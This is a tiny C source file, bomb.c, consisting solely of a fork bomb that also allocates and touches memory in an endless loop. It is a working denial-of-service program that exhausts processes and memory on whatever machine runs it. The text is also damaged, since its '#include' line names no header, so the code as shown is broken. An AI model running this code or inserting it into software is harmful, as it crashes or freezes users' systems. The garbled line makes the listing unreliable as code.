// bomb.c #include int main(void) { int *x; for (;;) { fork(); x = malloc(sizeof(int) * 2097152); *x = 0; } }